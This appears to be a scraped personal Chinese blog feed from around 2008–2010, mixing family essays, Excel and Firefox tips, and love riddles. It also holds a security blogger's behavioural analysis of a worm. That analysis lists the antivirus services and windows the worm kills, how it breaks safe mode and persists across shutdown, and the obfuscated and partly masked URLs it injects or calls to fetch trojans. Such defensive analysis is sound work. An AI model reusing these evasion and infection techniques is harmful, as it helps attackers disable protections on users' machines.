Copyright mytupa.com 2010-03-22 13:39:10 2010-03-22 13:39:10 http://86wf.mytupa.com http://86wf.mytupa.com mytupa.com 86wf 86wf cn Global New Blog 60 http://86wf.mytupa.com/blog/view.php?id=b4fee246da9f1b1a54acddc76b789573  
 
       曾在广播里听到，当孩子顶嘴甚至步入叛逆期时，做妈妈的总是唠叨，有一次已经高中的儿子不耐烦的顶撞了母亲，母亲气得半死。

   父亲的便约儿子一起出门散步。

  两人走了好久，父亲一路上不发一语，儿子纳闷。

   一直到要进家门口时，父亲拍拍儿子的肩膀， 以男人对男人的语气说 : 『等一下进去时，给我女人一点面子 !』

儿子惊讶于老爸用哥儿们的语气对他说话，并因男人跟男人之间的义气，从此对母亲毕恭毕敬的。

所以，有的时候，父亲这个角色还是颇重要的 !


当我的小孩顶撞我时，我想告诉他，下列的事任选一样，做到后，才有顶撞的权利：

1. 连续3 个月每吃完一餐就须催吐 (孕吐)


2. 乳头被别人吸到破皮达一个月 (喂奶)

3. 肚子塞一颗篮球达 10 个月 ( 怀孕)

4. 接受皮鞭抽打达 48 小时 (生小孩)

5. 10 个月不能喝冰水、咖啡、茶

6. 5个月睡觉不能翻身

7. 10 个月不能出游远行，不能跑跳

8. 10个月不能生病，要不，生病不能吃药

9. 至育婴室把屎把尿一个月

10. 晚上睡觉每二个小时起床一次，清醒30 分钟达一个月

写完上述 10 项，我觉得当娘的真不是人干的。

 

想起一个高中同学他说：有一次顶撞母亲，父亲把他从椅子上踹下来。

斥责他: 你妈是我捧在手心的宝，我呵护她，照顾她，对她轻声细语，你凭什么对他大呼小叫的!!!我的同学再也不敢顶撞母亲了。

很感动，尤其是最后一句是经典。

男人们，如果你们真的爱、疼你老婆（女朋友）记得这句话就够了！

老婆是拿来疼的，所以千错万错都是自己的错，不服气吗？

谁叫你当初追人家。

当妈的如果听到老公这么说，应该会很高兴吧！


男人要学着点...

  
]]> 2010-03-11 13:49:11 http://86wf.mytupa.com/blog/view.php?id=aec4b21ed875da87a0c13e264dbb7366 一个人久了，会懒得恋爱
一个人久了，朋友会越重要
一个人久了，会越来越喜欢听歌
一个人久了，电话会常常忘记带
一个人久了，就会养成一个怪癖
一个人久了，对爱情会越来越挑剔

一个人久了，除了寂寞点外还是蛮开心的
一个人久了，会慢慢变得成熟起来
一个人久了，会比以前更重视更爱父母，更重视亲情
一个人久了，对所有的节日大多没什么期待
一个人久了，听到看到别人一对对的很甜蜜，心里多少还是会有些介意

一个人久了，会喜欢买很多鞋子，带自己去很多很远的地方
一个人久了，会觉得无拘无束自由自在天宽地广
一个人久了，爱情会变得越来越不重要，取而代之的是钱和事业
一个人久了，会越来越理性，越来越现实

总之，一个人久了，是很幸福的时光……

即使有一点点无聊和寂寞
但是游走在自己的街道上，什么都可以无所谓 没有任何束缚

即使很多人都在疑惑
你，为什么没有告别一个人的时光
因为
一个人久了，会上瘾的...
]]> 2010-03-10 16:26:45 http://86wf.mytupa.com/blog/view.php?id=92f9d26dcf18073b67d9e9facbf3044e



]]> 2010-03-02 18:21:54 http://86wf.mytupa.com/blog/view.php?id=0f2df2c3bfbcbfe50f5f62a5d953d407 然后把C:Documents and SettingsAdministrator文件夹复制到d:user即ke。 
]]> 2010-01-07 14:08:24 http://86wf.mytupa.com/blog/view.php?id=3237d368eaf82f4f9f213559b1474061
点击进入： http://domain.9om.com/ 输入域名全称即可。


结果：
域名 86wf.mytupa.com  数理为 38 ，  其暗示的信息： 

名虽可得，利则难获，艺界发展，可望成功 。(凶带吉 )
]]> 2008-07-29 07:56:53 http://86wf.mytupa.com/blog/view.php?id=119be4ad924dead0f427429b2dde0390 小佳－－http://myhome0416.blog.sohu.com/
老高－－http://blog.sina.com.cn/u/1254256327
任伟－－http://blog.sina.com.cn/u/1227828484
老２－－http://blog.sina.com.cn/u/1259303342
三石－－http://sanshi.blog.phoenixtv.com/user3/sanshi/index.html
杨明－－http://blog.sina.com.cn/u/1261923680
老大－－http://qiang04302.blog.sohu.com/
MS全过期了
咬牙棒－－http://www.wapfo.com/wapfo/bk/default.asp
雲端漫步--http://wangqiang0158.blogcn.com/index.shtml
米粒儿--http://flower7wj.blogcn.com/index.shtml
]]> 2008-04-15 10:05:46 http://86wf.mytupa.com/blog/view.php?id=f27eee6191f62961202aa0fc5db7280f dx = Replace(Application.Text(Round(n+0.00000001, 2), ""[DBnum2]""),""."", ""元"")
dx = IIf(Left(Right(dx, 3), 1) = ""元"", Left(dx, Len(dx) - 1) & ""角"" & Right(dx, 1) & ""分"", IIf(Left(Right(dx, 2), 1) = ""元"", dx & ""角整"", IIf(dx = ""零"", """", dx & ""元整"")))
dx = Replace(Replace(Replace(Replace(dx, ""零元零角"", """"), ""零元"", """"), ""零角"", ""零""), ""-"", ""负"")
End Function

excel里功能最全最短（7行）的人民币大写函数]]> 2008-04-10 15:43:33 http://86wf.mytupa.com/blog/view.php?id=806f02372d60c9bfb14b345c1710ce37 1.修改了纪录里欧洲赛场出场纪录的错误(感谢神之库珀的提醒）

 2008.4.11更新 
1.增加了球队的纪录和球员的纪录。（感谢lizic的提醒） 
2.修改了球队纪录里的错误。 
3.增加了球队队徽的演变历史。（感谢蓝黑屠刀的提醒） 
MD5：2f56f11209eeca62808b76a8d30fb8aa 
大小：7.31 MB (7,669,218 字节) 
地址：http://ishare.iask.sina.com.cn/cgi-bin/fileid.cgi?fileid=3610290
 共享中心（只有一个版本是最新的。这是共享中心的主页）：http://iask.sina.com.cn/h/user.php?uid=1463023651&fixed=ishare 如果发现错误请告诉我（我一个人确实找不出错误）。。我不想误导大家。由于出现错误就得更新。。所以请朋友们下新的版本。地址只有一个，那一个就是最新的。 
]]> 2008-04-09 22:37:54 http://86wf.mytupa.com/blog/view.php?id=cd0f1470b4546f3e714d13396f4ebf08 Windows 2000/XP下，收藏夹默认保存在C:\Documents andSettings\用户名\收藏夹下，请以你的用户名登录Windows，然后在D盘下新建一个Favorites文件夹，再打开注册表编辑器，到 HKEY_USERS\.Default\Software\Microsoft\Windows\CurrentVersion\Explorer \UserShellFolders下，将字符串值Favorites的键值改为D:\Favorites，然后重新启动电脑即可

如何备份FireFox浏览器

使用FireFox的朋友会发现，我们每次重装系统后FireFox浏览器的收藏夹和插件都会丢失，我们不得不重新安装这些常用的插件和导入收藏夹。插件丢失的原因是因为FireFox的配置文件默认安装在C盘下，如果我们把配置文件放在其他的分区就会解决问题。

    FireFox的默认配置文件夹是：C:\Documents and Settings\Administrator\Application Data\Mozilla\Firefox\Profiles\971gb0ms.default。其中，Administrator是你的系统用户名，971gb0ms.default是一个默认的配置文件夹，可能不同的人电脑上的文件夹名称不一样，不过没关系，只要是位于资源管理器的那一层目录就可以了。C:\Documents and Settings\Administrator\Application Data文件夹是隐藏的目录，需要显示隐藏才能看到。

我们的做法是：

1、在非系统分区新建配置文件夹

    新建一个自己希望存放配置文件的文件夹，如果你使用的是绿色版的FireFox，那么推荐你在FireFox下建立一个profiles文件夹，然后在profile文件夹下建立你希望存放配置文件的文件夹比如myprofile。

2、复制出来当前的配置

    把C:\Documents and Settings\Administrator\Application Data\Mozilla\Firefox\Profiles\971gb0ms.default下的内容复制到你新建的myprofile文件夹下，这样可以保证你的当前配置不会丢失。

3、新建FireFox配置

    在命令行模式下进入到FireFox的目录下,用带参数p命令启动FireFox（firefox.exe -p）。我们就会看到配置文件设置的界面：

4、定位配置文件到你希望存放的文件夹

    点击创建配置文件，在下一步选择存放的位置（myprofile）即可；

 

    保证你新建的配置是默认的配置。那么下次你启动FireFox的时候它就会使用你的配置文件。这样就能保证你的FireFox永远不变了。]]> 2008-04-09 13:27:41 http://86wf.mytupa.com/blog/view.php?id=106117290bf1c55bbf9aea7382db585e
这东西接近无敌了：

绕主防/Hips、Byshell技术、监控文件、破组策略/IFEO、U盘感染

进程守护、关杀软、屏蔽安全工具、感染文件（带加密）、破坏安全模式等等

哈哈。

测试为反汇编和一些实机运行跟踪。

因为壳的原因，可能分析的不准确。 :)

1、检查互斥体"xcgucvnzn"，判断病毒是否已加载在内存中。

如存在，则退出，防止多个病毒体被执行。

2、创建文件：

C:37589.log 93696 字节
C:lsass.exe.1771547.exe 93696 字节

C:WINDOWSsystem32Comlsass.exe 93696 字节
C:WINDOWSsystem32Comsmss.exe 40960 字节
C:WINDOWSsystem32Comnetcfg.000 16384 字节
C:WINDOWSsystem32Comnetcfg.dll 16384 字节

C:WINDOWSsystem321878253.log 93696 字节（随机）
C:WINDOWSsystem32dnsq.dll 32256 字节

3、删除组策略限制的注册表项：

HKEY_LOCAL_MACHINESOFTWAREPoliciesMicrosoftWindowsSafer

4、删除：

HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindowsCurrentVersionRun

HLMSOFTWAREMicrosoftWindowsCurrentVersionRunOptionalComponents

HKEY_CURRENT_USERSoftwareMicrosoftWindowsCurrentVersionExplorerShell Folders

5、破坏安全模式，删除：

SYSTEMCurrentControlSetControlSafeBootNetwork{4D36E967-E325-11CE-BFC1-08002BE10318}
SYSTEMControlSet001ControlSafeBootNetwork{4D36E967-E325-11CE-BFC1-08002BE10318}
SYSTEMCurrentControlSetControlSafeBootMinimal{4D36E967-E325-11CE-BFC1-08002BE10318}
SYSTEMControlSet001ControlSafeBootMinimal{4D36E967-E325-11CE-BFC1-08002BE10318}

6、防止病毒体被重定向，删除：

SOFTWAREMicrosoftWindows NTCurrentVersionImage File Execution Options

（禁止写入）

7、释放驱动C:NetApi000.sys（DeviceNetApi000）恢复SSDT Hook。

最后删除自身。导致HIps和主动防御失效。

8、修改注册表，开启自动播放：

NoDriveTypeAutoRun DWORD: 145

9、删除服务项（如果有）：

SYSTEMCurrentControlSetServicesKSysCall
SYSTEMCurrentControlSetServicesEQService
SYSTEMCurrentControlSetServicesHookSys
SYSTEMCurrentControlSetServicesMcShield
SYSTEMCurrentControlSetServicestmmbd
SYSTEMCurrentControlSetServicesPAVSRV
SYSTEMCurrentControlSetServicesSymEvent
SYSTEMCurrentControlSetServicesekrn
SYSTEMCurrentControlSetServicesKAVBase
SYSTEMCurrentControlSetServicesklif
SYSTEMCurrentControlSetServicesAntiVirService
SYSTEMCurrentControlSetServicesMPSVCService

10、调用cacls.exe，设置system32com 和病毒文件的权限为Everyone:F。

11、system32com下启动smss.exe和lsass.exe，使用进程守护。

当一方被结束时，另一个则将其重新启动。

12、C:windowssystem32dnsq.dll安装全局钩子，注入所有运行中的进程。

13、发送垃圾消息到如下窗口，导致程序无法正常响应，处于假死状态：

avast
mcagent
escan
firewall
AfxControlBar42s
tapplication
antivir
ThunderRT6Timer
thunderrt6formdc
SREng
thunderrt6main
eset
mcafee
afx:
360anti
360safe
avg
facelesswndproc
bitdefender
ewido
#32770
monitor
dr.web

诊
具
SREng 介绍
升级
微点
防
云
墙
kv
木
狙剑
金山
瑞星

..........

14、尝试关闭包含kissvc、guard、watch、scan、twister字符串的进程。

15、独占方式访问：boot.ini和hosts。防止dos级删除病毒和用hosts屏蔽恶意网站。

16、查找网页格式文件，加入一段框架：

http:#####//%6A%73%2E%6B%30%31%30###11111###%32%2E%63%6F%6D/%30%31%2E%61%73%70/2233

解密得：http://js.k0102########.com/01.asp（为安全起见###为空白）

该地址会检测referer，返回的来源地址如果有效，则执行：hxxp://js.k0102.com/a11.htm

感谢刺猬大大的指点。

17、ping.exe -f -n 1 www.baidu.com。如果网路通畅，调用IE访问：

hxxp://jj.gxgxy.net/html/dg2.html
hxxp://jj.gxgxy.net/html/qb2.html

每隔一段时间执行一次。垃圾广告啊。

18、在可用磁盘生成：pagefile.exe和Autorun.inf，并每隔几秒检测一次。

19、修改注册表：

SOFTWAREMicrosoftWindowsCurrentVersionExplorerAdvancedFolderSuperHidden

把REG_SZ, "checkbox"值填充垃圾数据，破坏“显示系统文件”功能。

20、每隔一段时间会检测自己破坏过的显示文件、安全模式、Ifeo、病毒文件等项。

如被修改则重新破坏。

21、忽略系统盘感染可执行文件，还加密..感染过的程序图标变16位的（模糊）。

支持Rar压缩包内可执行程序的感染 - -!

22、“高科技”：

使用了byshell的技术，当系统关机时调用SeShutdownPrivilege函数时

这时候dnsq.dll会将C盘下的某某.log拷贝到：

C:Documents and SettingsAll Users「开始」菜单程序启动

名字格式差不多是：~.exe.某某.exe

最后计算机重启后，等病毒完全释放，立刻就删除这个：~.exe.某某.exe

哈哈，真是天衣无缝啊。

其实这种垃圾技术，只要冷启动就可以对付了。

23、尝试删除dnsq.dll的时候，它会立刻重启计算机。由第22点，关机前写入病毒。

造成一个死循环。

24、监控lsass.exe、smss.exe、dnsq.dll文件，假设不存在，由dnsq.dll重新拷贝回去。

因为dnsq.dll安装的是全局钩子（在所有进程中），所以非常麻烦。理论上不可能删除成功

25、当拷贝失败后，病毒会调用rd /s /q命令删除原来的文件，再重新写入。

那么所谓的免疫文件夹就失效了，其中包括歧义文件夹。

26、连接http://**.k0***.com/go.asp计算感染人数并跳转http://**.k0***.com/goto.htm下载木马。

过几天无聊了再去测试.. - -

 解决方案

另外附上安铁偌的磁碟机专杀：

www.kingzoo.com/tools/孤独更可靠/Auk_diskGenKiller.exe

个人防护建议：

1、打齐系统补丁。

2、安装杀毒软件和防火墙，并开启自动升级。

3、不浏览yellow网站，下载软件时尽量到大网站或官方。]]> 2008-04-08 10:02:40 http://86wf.mytupa.com/blog/view.php?id=3b51aec4ff33c7e8ea5c975422a9b202
EXE文件进行汉化，反编译，资源编辑中最常用的3个工具

PE Explorer 1.98 R2 汉化版



   功能极为强大的可视化汉化集成工具，可直接浏览、修改软件资源，包括菜单、对话框、字符串表等； 另外，还具备有 W32DASM 软件的反编译能力和PEditor 软件的 PE 文件头编辑功能，可以更容易的分析源代码，修复损坏了的资源，可以处理 PE 格式的文件如：EXE、DLL、DRV、BPL、DPL、SYS、CPL、OCX、SCR 等 32 位可执行程序。该软件支持插件，你可以通过增加插件加强该软件的功能， 原公司在该工具中捆绑了 UPX 的脱壳插件、扫描器和反汇编器，非常好用。
   唯一遗憾的是欠缺字发典功能


下载地址：http://www.hanzify.org/?Go=Show::List&ID=6447



 eXeScope 6.5 汉化版



小巧但功能极其强大的本地化工具，可以直接修改 VC++ 及 DELPHI 编制的 PE 格式文件的资源，包括菜单、对话框、字符串和位图等，也可与其它本地化工具配合使用。
在汉化中不推荐使用 eXeScope 作为汉化工具，仅作为汉化辅助工具。6.50 版主要对 DELPHI 7 编译的程序支持较好，对 DELPHI 7 以前版本编译的程序，建议使用 6.30 版本，因为该程序对 Unicode 字符显示支持不好。
下载地址：http://www.hanzify.org/?Go=Show::List&ID=5905 



Resource Hacker 3.4.0.79 官方简体 


l{H^rMgE
一个类似于eXeScope的但在某些方面比它还好一些的工具。1. 查看 Win32 可执行和相关文件的资源 (*.exe, *.dll, *.cpl, *.ocx)，在已编译和反编译的格式下都可以。2. 提取 (保存) 资源到文件 (*.res) 格式，作为二进制，或作为反编过的译资源脚本或图像。图标，位图，指针，菜单，对话，字符串表，消息表，加速器，Borland 窗体和版本信息资源都可以被完整地反编译为他们各自的格式，不论是作为图像或 *.rc 文本文件。3. 修改 (替换) 可执行文件的资源。图像资源 (图标，指针和位图) 可以被相应的图像文件 (*.ico, *.cur, *.bmp)，*.res 文件，甚至另一个 *.exe 文件所替换。对话，菜单，字符串表，加速器和消息表资源脚本 (以及 Borland 窗体) 可以通过使用内部资源脚本编辑器被编辑和重新编译。资源也可以被一个 *.res 文件所替换，只要替换的资源与它是同一类型并且有相同的名称。4. 添加新的资源到可执行文件。允许一个程序支持多种语言，或者添加一个自定义图标或位图 (公司的标识等) 到程序的对话中。5. 删除资源。大多数编译器添加了应用程序永远不会用到的资源到应用程序中。删除这些不使用的资源可以减小一个应用程序的大
下载地址：http://www.hanzify.org/?Go=Show::List&ID=2442 



以上3款就是对EXE文件进行汉化，反编译，资源编辑中最常用的3个工具



PS:另一反编译网站
http://www.remotesoft.com/salamander/

写代码的成果就被这些东西给OVER了..哎.]]> 2008-03-24 10:06:21 http://86wf.mytupa.com/blog/view.php?id=8d417ae43ec9ddbc32bc8e974f73ecaa
“多么熟悉的名字，肆虐多少年风和雨，从来不需要想起，永远也不会忘记”。当记者听到微点反病毒专家介绍的一种新型病毒传播手段的时候，不禁想起了这熟悉的旋律——灰鸽子，这熟悉而又陌生的木马，“从来不需要想起，永远也不会忘记”。


　　据微点反病毒专家介绍，这例“Backdoor.Win32.GreyPigeon.ipa”灰鸽子木马变种的传播方式着实耐人寻味。黑客“煞费苦心”将木马程序植入一个CHM(一种帮助文件格式)文件(图1)，从CHM页面上的几行文字我们不难分析出，这是一种基于“社会工程学”的钓鱼攻击手法(图1)。黑客首先诱惑广大网民，某某电影或视频存于某加密压缩文件内，密码则位于该CHM文件内。这样网友下载加密压缩视频之后，自然会去打开CHM 文件查找密码。所谓的“钓鱼攻击”，就是指黑客诱使网民上钩，和传统意义上的病毒自行传播有着本质的区别。这里面有一个细节很有意思，黑客为了确保最终显示效果，特意将繁体“解壓密碼”四个字用图片来显示，以防止因内码不同繁体字显示为乱码。从这个细节可以看到，木马“市场营销”黑客经济的专业化和完善程度。


PS：
这是木马传播的新思路，值得深思。。]]> 2008-03-11 08:39:12 http://86wf.mytupa.com/blog/view.php?id=90eaf14dcf3ff3fa739c5cd5bf97d6b0
      天鹅湖边鸟飞绝，白天相约解相思，唯忘只得我关心，双点齐把国玉移，无奈如何人归去，宝玉不见于谷外，双思只在内心旁，单身贵族尔相连

      天鹅湖边鸟飞绝，良无一点双人行；双木非林心相连，您若无心先自飞。

      天鹅一出鸟不见 我 我愿携君天地间，
      一个人在把心牵 不(怎)？ 不觉万水与千山。

      双匕割月旁边站 能 能得知己明琴语，

      水流几处又落天(下) 没 没尽红尘听鼓喧。

      一月有别心(真)想你 有 有酒无花同雅趣，

      单身贵族已相连(随) 你 你情我意共枝连。

      树木靠十冲天跃 杜 杜宇一声啼梦碎，

      月里嫦娥嘴最甜 鹃 娟娟月影琐窗寒。

      星星不见太阳光 生

      永眠长逝莫悲伤 死

      虚空极尽莫能计 无

      每在心旁总情长 悔

      人随水去泪汪汪 全

      心力点点酒苍茫 为

      还记十月相倚伴 有

      谁人犹在我他旁 你

      日出美丽立取上 最

      残月屋下友情长 爱

      无奈您却无心往 你

      白水一勺表衷肠 的

      春雨绵绵别三笑 人

      但已人去走下场 是

      嫦娥无女不寻常 我

      飞蛾扑火虫已逝 我

      学友无子留撇须 爱

      偶尔留得一人在 你

      三言并没有两语 一

      牛仔过河搭木筏 生

      仕别三日在这里 一

      原来这字在界前 世

      接受又离只作友， 爱

      情人无心土月勾， 一

      竹已孤竹单思苦， 个

      从也单从独自愁， 人

      如需闭口一了伴， 好

      谁人无言又同游。 难

      天鹅一去鸟不归 我

      怀念昔日空费心 不

      云破月来七成影 能 （云开月明双匕影）

      水流几处又相逢 没

      明天日落人依月 有

      单身贵族尔相称 你

      寒山寺上一棵竹， 等

      不能做称有人用， 你

      此言非虚能兑现， 说

      只要有情雨下显， 爱

      天鹅一出鸟不见。 我

      淮海又见水退时， 难

      双人换走阻碍石， 得

      月顶右手不见口， 有

      青年男女树心旁， 情

      世上何物最懂爱。 人

      情到浓时人憔悴， 青

      爱到深出心不悔， 梅

      念你忘你都不对， 竹

      宁愿伤心自己背。 马

      牛靠和尚屋 特

      两人抬一木 来

      两木不成林 相

      水中鸳鸯成双对 亲（？）

      一心两意记念谁 想（？）

      丝线穿针十一口 结

      女氏还在日上游 婚

      一人尔旁站 你

      橘红无丝织 是

      无山登峨嵋 我

      椰子亦能语 心

      深藏不见底 中

      白芍本非草 的

      寒冬病缠身 疼

      心死两相依 忘

      知己所言真 记

      人在尔旁站 你

      饥饿去无食 我

      人故想永共 做

      还来还要走 不

      至死也相随(遇) 到

      孝子要习文 教

      鹅边鸟飞去 我

      饶人必无心 如

      河干人独立 何

      还来还要走 不

      相思只一心 想

      好女愿他旁 她

      木目跨于心， 想

      古人做反文， 做

      小和尚光头， 你

      凄惨无泪水。 妻

      下珠帘焚香去卜卦, 一

      问苍天侬的人儿落谁家? 二

      恨王郎全无一点真心话, 三

      欲罢不能罢(注:繁体中"罢"为四字下面加一能字), 四

      吾把口来压. 五

      论文字交情不差(叉), 六

      染成皂难讲一句请白话. 七

      分明一对好鸳鸯却被刀割下, 八

      抛得奴力尽手又乏, 九

      细思量口与心具是假. 十

      天鹅飞来鸟不归 我

      回峰山中我独醉 的

      良晨美景斜眼看 心

      孤独寂寞深深埋 只

      日夜花草为依伴 可

      青春虚度苦不堪 容

      此番招罪为哪般 纳

      有朝一日兄台来 你

      鸟飞鹅跳 我

      月上中梢 用

      目上朱砂 自

      已异非巳 己

      勺旁傍白 的

      万事开头 方

      工戈不全 式

      雨下挚友 爱

      称断人和 你

      悔意无心空对月 每

      大哥头上有条疤 天

      接受不离只作友 爱

      单身贵族尔相伴 你

      朝夕相对盼夕阳 多

      情人别离影孤单 一

      二人想逢在此处 些

      一：天鹅飞去鸟不归， 怀念昔日空费心， 云开月下双匕影， 水流几处又相逢， 日落

      月出人倚月， 单身贵族尔相随。 （我不能没有你）


      二：天鹅飞去鸟不归， 良字无头双人配； 受字中间多两笔（双木非林心相连）， 人尔

      结合就是自己。

      （我很爱＜想＞你）


      三：青山寺上一丛竹 天鹅还在鸟已去 前尘往事以成空 白云心中多条虹 心中有情藏不

      住

      站在高处看远方 称断人和有谁知 （等我亲自说爱你）


      四： 天鹅湖边鸟飞绝 白天相约解相思 唯忘只得我关心 双点齐把国玉移 无奈如何人归

      去 宝玉不见于谷外 双思只在内心旁 单身贵族尔相连 （我的心只可容纳你）


      五：天鹅飞去鸟不归，回峰山中我独醉。良辰(晨)美景斜眼看，孤独寂寞深深埋。日夜

      花草为依伴，青春虚度苦不堪。此番招罪为哪般，有朝一日兄台来。（现无法确定是那

      一条，答案都是一样的烂。说法一：我仍朝思暮想着你 说法二：我一直在深爱着你 更

      有趣的是说法三：我峨嵋派弃暗投明 ）


      六:天鹅一出鸟不见 一月有别心想你 一个人在把心牵 单身贵族已相连 双匕割月旁边站

      树木靠土冲天跃 水流几处又落天 月里嫦娥口最甜 (我不能没有你杜鹃)


      七: 天鹅飞去鸟未归，两木相连心相连，日去东海月归西，春季秋东是四季，良字无头

      死紧迫，您若无缘各自飞，丝线一家十一口，女氏出门何日归 (我想明年和你结婚)


      八：情到浓时人憔悴，爱到深处心不悔， 念你忘你都不对，宁愿伤心自己悲。 不怨苍

      天不怨谁，人生不如梦一回， 惯看花开花又谢，却怕缘起缘又灭。（青梅竹马,两小无

      猜 ）


      九：日出美丽立取上，残月屋下友情长，无奈您却无心住，白水一勺表衷肠，春雨绵绵

      别三日，但已人去走下场，嫦娥无女不正常（最爱你的人是我）


      十：ss!w noh hldaap pub noh shbmlb u! hw pu!wi

      （miss you deeply and you always in my mind!）


      十一：2580*14789*2486*14863*532489*15803*2486*1478963

      （I L O V E Y O U，对照手机键盘自己画一下就知道了）

      

      ————————————————————————————————————

      1，天鹅一出鸟不见，一个人在把心牵，双匕割月旁边站，水流几处又落天，一月有别心

      想你，单身贵族已相连，树木靠十冲天跃，月里嫦娥口最甜（A:我不能没有你杜娟）

      2，星星不见太阳光，永眠长逝莫悲伤，虚空极尽莫能计，每在心旁总情长，人随水去泪

      汪汪，心力点点酒苍茫，还记十月相倚伴，谁人犹在我他旁（A:生死无悔全为有你）

      3，日出美丽立取上，残月屋下友情长，无奈您却无心往，白水一勺表衷肠，春雨绵绵别

      三笑，但已人去走下场，嫦娥无女不寻常（A:最爱你的人是我）

      4，飞蛾扑火虫已逝，学友无子留撇须，偶尔留得一人在，三言并没有两语，牛仔过河搭

      木筏，仕别三日在这里，原来这字在界前（A:我爱你一生一世）

      5，悔意无心空对月，大哥头上有条疤，接受不离只作友，单身贵族尔相伴，朝夕相对盼

      夕阳，情人别离影孤单，二人想逢在此处（A:每天爱你多一些）

      6，青山寺上一丛竹，只见天鹅不见鸟，站在树上远眺望，白云心中有条虹，心中情意藏

      不住，寻寻觅觅下友情，您若无心我心碎（A:等我亲自说爱你）

      7，接受又离只作友，情人无心土月勾，竹已孤竹单思苦，从也单从独自愁，如需闭口一

      了伴，谁人无言又同游（A:爱一个人好难）

      8，天鹅一去鸟不归，怀念昔日空费心，云破月来七成影，水流几处又相逢，明天日落人

      依月，单身贵族尔相称（A:我不能没有你）

      9，寒山寺上一棵竹，不能做称有人用，此言非虚能兑现，只要有情雨下显，天鹅一出鸟

      不见（A:等你说爱我）

      10，寒山寺上一颗竹，您若无心各自飞，丝丝情意来半合，天鹅池边鸟飞绝，把盏无皿

      金

      来做（A:等你给我钱）

      11，淮海又见水退时，双人换走阻碍石，月顶右手不见口，青年男女树心旁，世上何物

      最

      懂爱（A:难得有情人）

      12，友情雨下永相伴，人情相遇有尔时，大雁南飞非人字，方知缘了应无点，除夕过后

      是

      何天（A:爱你一万年）

      13，牛靠和尚屋，两人抬一木，两木不成林，水中鸳鸯成双对，一心两意记念谁，丝线

      穿

      针十一口，女氏还在日上游（A:特来相亲想结婚）

      14，一人尔旁站，橘红无丝织，无山登峨嵋，椰子亦能语，深藏不见底，白芍本非草，

      寒

      冬病缠身（A:你是我心中的疼）

      15，心死两相依，知己所言真，人在尔旁站，饥饿去无食，人故想永共，还来还要走，

      至

      死也相随（A:忘记你我做不到）

      16，孝子要习文，鹅边鸟飞去，饶人必无心，河干人独立，还来还要走，相思只一心，

      好

      女愿他旁（A:教我如何不想她）

      17，春雨季 梧桐树上结丝绸；夏日凉 两人阵中称英雄；秋风起 鸿雁传音数千里；冬雪

      飘 美女为何露半腰（A:绝对重要）

      18，木目跨于心，古人做反文，小和尚光头，凄惨无泪水（A:想做你妻）

      19，树儿睁开眼，小子屋下眠，良心缺一点，日落残兔边（A:相见恨晚）

      20，鸟飞鹅跳，月上中梢，目上朱砂，已异非巳，勺旁傍白，万事开头，工戈不全，雨

      下

      挚友，称断人和（A:我用自己的方式爱你）

      21，古树撑天枝难觅，怀抱可怜却无心，赵国有妃不是女，鹅毛轻飘鸟不见，远去不想

      囊

      羞涩，受尽苦难又换友，自称有人伴君旁（A:对不起我还爱你）

      22，原本有心花不开，偶尔有人来相伴，悔时无心已有泪，吞下口去悄无声，来者耳边

      轻

      轻诉，缺少左边心相印，东风带走一二点（A:愿你每天都快乐）

      23，天鹅湖边鸟飞绝，白天相约解相思，唯忘只得我关心，双点齐把国玉移，无奈如何

      人

      归去，宝玉不见于谷外，双思只在内心旁，单身贵族尔相连（A:我的心只可容纳你）


      ——————————————————————————————————————

      584，5682177778，12234，1798，76868，58712，9955，829475

      我发誓,我来伴你一起去吹吹风,与你爱相随,一起走吧,去溜达溜达,我不需要你朝朝暮暮

      ,被爱就是幸福

      

      0 字部


      019425 你依旧是爱我

      02746 你恶心死了 02825 你爱不爱我

      03456 你相思无用

      0437 你是神经 04517 你是我氧气

      0456 你是我的

      04567 你是我老妻 0457 你是我妻

      045692 你是我的最爱

      0487 你是白痴 0487561 你是白痴无药医

      0564335 好无聊时想想我 0594184 你我就是一辈子 065 原谅我

      06537 你惹我生气 07382 你欺恶怕善 0748 你去死吧

      07868 你吃饱了吧 08056 你不理我啦 0837 你别生气

      08376 你别生气了 095 你找我 098 你走吧


      1 字部


      1240 最爱是你

      1314 一生一世 1314925 一生一世就爱我

      1372 一厢情愿

      1392010 一生就爱你一个 1414 意思意思

      147 一世情

      1573 一往情深 1711 一心一意


      2 字部


      200 爱你哦

      20110 爱你一亿年 20160 爱你一万年

      20170 爱你一千年

      20184 爱你一辈子 2030999 爱你想你久久久

      2037 为你伤心

      20475 爱你是幸福 20609 爱你到永久

      207374 爱你七生七世 20863 爱你到来生 20999 爱你久久久

      220225 爱爱你爱爱我 230 爱上你 234 爱相随

      235 爱上我 240 爱死你 246 饿死了

      246437 爱是如此神奇 25184 爱我一辈子 25873 爱我到今生

      25910 爱我久一点 259695 爱我就了解我 259758 爱我就娶我吧

      2627 爱来爱去 282 饿不饿 2925184 爱就爱我一辈子

      296 爱走了


      3 字部


      300 想你哦

      30920 想你就爱你 309420 想你就是爱你

      3013 想你一生

      31707 LOVE(把BP机倒过来看) 32012 想念你的爱

      32069 想爱你很久

      3207778 想和你去吹吹风 330335 想想你想想我

      3344 生生世世 3399 长长久久 356 上网了

      35910 想我久一点 3731 真心真意 39 THANK YOU


      4 字部


      440295 谢谢你爱过我

      4422335 时时刻刻想想我 4457 速速回机

      456 是我啦

      460 思念你


      5 字部


      505 SOS

      507680 我一定要追你 510 我依你(我已来)

      51020 我依然爱你

      51095 我要你嫁我 51396 我要睡觉了

      514 无意思

      515206 我已不爱你了 51620 我依然爱你

      51820 我已不爱你 518720 我一辈子爱你 51920 我依旧爱你

      51930 我依旧想你 520 我爱你 5201314 我爱你一生一世

      520*10000 我爱你一万年 5203344 我爱你生生世世 52094 我爱你到死

      521 我愿意 5230 我爱上你 5240 我爱是你

      52406 我爱死你了 526 我饿了 5260 我暗恋你

      530 我想你 530184 我想你一辈子 53207778 我想和你去吹吹风

      53406 我想死你了 53517230 我想我已经爱上你 5360 我想念你

      5366 我想聊聊 5376 我生气了 53719 我深情依旧

      53770 我想亲亲你 53782 我心情不好 53880 我想抱抱你

      53980 我想揍扁你 540086 我是你女朋友 54033 我是你先生

      5406 我是你的 5407 我是你妻 54064 我是你老师

      54074 我是你妻子 54086 我是你八啦 5420 我只爱你

      54335 无事想想我 543720 我是真心爱你 54430 我时时想你

      5452830 无时无刻不想你 546 我输了 5460 我思念你

      5490 我去找你 54920 我始终爱你 554528096我无时无刻伴你左右

      555 呜呜呜 55646 我无聊死了 556520 我不能不爱你

      558 午午安 55926 我有多无聊 5620 我很爱你

      562059487 我若爱你我就是白痴 5630 我很想你 564335 无聊时想想我

      5670 我要娶你 570 我气你 57350 我只在乎你

